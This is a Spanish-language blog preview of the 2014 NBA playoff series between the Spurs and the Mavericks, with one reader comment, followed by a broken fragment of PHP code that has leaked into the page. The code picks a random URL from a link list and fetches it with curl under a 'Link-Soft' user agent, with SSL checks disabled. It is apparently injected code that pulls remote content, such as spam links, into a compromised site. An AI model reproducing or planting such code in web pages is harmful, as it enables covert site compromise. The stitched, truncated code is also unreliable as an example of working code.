PO 2014: Previa San Antonio Spurs – Dallas Mavericks

19 de April de 2014 por Sancho88

El duelo texano será sobre el papel el más desigual en la Conferencia Oeste. Se enfrentan el primero contra el octavo. Los Mavs, además, han perdido los últimos 9 partidos disputados contra los Spurs, lo que da una ventaja psicológica muy grande al equipo dirigido con maestría por Gregg Popovich. Los Spurs llegan un año más impecables a su fiesta con el baloncesto. La eterna sombra de la decadencia no llega nunca y aquí no vamos a jugar a ser Nostradamus. Son el equipo número 1 de la NBA con sus 62 victorias, solo han perdido 1 partido de los últimos 15 disputados en El Álamo y le tienen tomada la medida a Nowitzki y compañía. Esta temporada el casillero de partidos entre los dos equipos marca un rotundo 4-0 a favor de los Spurs, con una diferencia media de 11,5 puntos en las cuatro victorias. Solo este dato debería valer para calibrar la eliminatoria.

Es el ‘via crucis’ particular que le ha tocado a Dallas tras perder el último partido de temporada con los Grizzlies. En la prórroga se jugaban el 7º y 8º puesto de conferencia, pero la mala defensa texana permitió a Memphis sobreponerse a un triple de Nowitzki y llevarse el partido con dos acciones muy mal defendidas por los Mavs. Un rebote mal cerrado permitió a Tony Allen poner a un punto a los Grizzlies, y una falta ridícula de Carter sobre Conley enterró definitivamente las opciones de ser séptimos.

No obstante, conviene recordar también que Dallas tiene un record de 49 victorias esta temporada, mejor que las 48 de los Raptors, por ejemplo. Es decir, serían terceros en el Este, por lo que presentarán batalla contra los Spurs.

Claves de la eliminatoria:

  • Hambre de victoria: Los Spurs son adictos al baloncesto, yonquis del triunfo. No les vale con su palmarés (16 temporadas consecutivas en Playoffs sin bajar del 60% de victorias, 4 anillos y 5 finales). Para ellos no existe el pasado, y su final como dinastía lo pondrán las lesiones, seguramente, puesto que en el tema de motivación van más que sobrados. Tim, Manu y Tony no quieren separarse, no van a romper la magia en este momento. Los tres llegan en buenas condiciones, con muchas ganas de sacarse el mal sabor de boca de la eliminatoria por el título contra los Heat el año pasado. los Spurs asustan más que nunca.
  • El poder de los perímetros: Sabemos cómo prepara los Playoffs Popovich, cómo ajusta los sistemas, cómo puede cambiar en décimas de segundo el destino de los partidos gracias a la pizarra. Sabemos que la artillería de los Spurs empieza en Belinelli pero no termina hasta el jugador número 12 de la rotación: Matt Bonner. Va a ser un precioso duelo de pistoleros. Manu, Mills, Green, Belinelli contra Monta Ellis, Calderón, Nowitzki y Carter. Los dos equipos promedian cerca del 40% en triples, aunque también permiten menos del 35% de acierto rival. Veremos qué estadística se impone y quién es capaz de parar a quién. Ojo a Danny Green en este aspecto, el hombre record de las pasadas finales.
  • ‘I want some nasty!’: Popovich no quiere jugadores de baloncesto en los Playoffs. El busca perros de presa, gente que pelee, que le de algo más sucio, algo más horrible. Y ahí es donde empieza la influencia de una maquinaria perfecta. Kawhi Leonard es su hombre, el que le recuerda la dureza de antaño de Bruce Bowen, y gente como Green, Splitter y el mismo Duncan se dejan la piel en cada jugada defensiva. Esta temporada Dallas ha estado muy lejos de poder competir con los Spurs. Está claro que cuando toque ponerse ‘nasty’, como dice Popo, sus Spurs lo van a hacer. No está tan claro en el caso de los Mavericks. Solo Marion y Dalembert pueden dar un punto más de agresividad en la defensa, pero los años no perdonan.
  • Duncan vs Nowitzki: Y llegamos al gran plato fuerte de esta eliminatoria. Independientemente de la barrida que se puede llegar a barruntar a favor de los Spurs, esta eliminatoria merecerá la pena por el gran duelo de leyendas que nos tiene preparada. Los dos entrarán en el ‘Hall of fame’ en cuanto pongan un pie fuera de las pistas. Los dos son genios modernos del deporte de la canasta. Nowitzki es ya el 10º máximo anotador de la historia de la liga al devorar el record de Oscar Robertson y su proyección lo sitúa como 6º a la altura de Shaquille O’Neal al final de su carrera. Probablemente cuando Dirk deje las canchas solo 5 tíos en toda la historia habrán metido más puntos que él en una cancha de baloncesto en la NBA. Él ya tiene su anillo de 2011, ese que arrebató por sus huevos toreros a LeBron y compañía. En esta eliminatoria lo pasará bien, no hay presión para sus Mavericks. Son inferiores por concepción. Por parte de ‘The big fundamental’ su legado será parecido. Es el máximo taponador de la historia de los Playoffs, 8º en temporada regular, y cuando se retire superará probablemente los 25.000 puntos, 15.000 rebotes, 4.000 asistencias, 3.000 tapones y 1.000 robos. Casi nada. Duncan ha reconocido que si hubiera ganado el quinto anillo ya se habría retirado probablemente. Esperemos que jamás se retire. Como eso es imposible, al menos que espere un par de añitos más. Este año renovará con los Spurs segurísimo. Queremos verle con 40 castañas en una pista de baloncesto.

Pronóstico: 4-1. El duelo de defensas decantará la eliminatoria, como lo ha hecho a lo largo de la temporada regular. San Antonio tiene muchos más recursos en la pintura y más profundidad de banquillo. Aunque el ataque equilibra a ambos equipos, la diferencia atrás decidirá la eliminatoria.

Comenta

Un comentario a esta entrada

  1. TheDeerHunter dice:
    #1

    Aroma a clasicazo.
    En la era Popovich se han enfrentado en 5 ocasiones (desde la 1998-99) con cierta ventaja para los Spurs (3-2)
    En primera ronda únicamente han coincidido dos veces, con resultado de empate.

    Los Mavs es un equipo que no me termino de creer, aunque me pasaba lo mismo cuando quedaron campeones.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>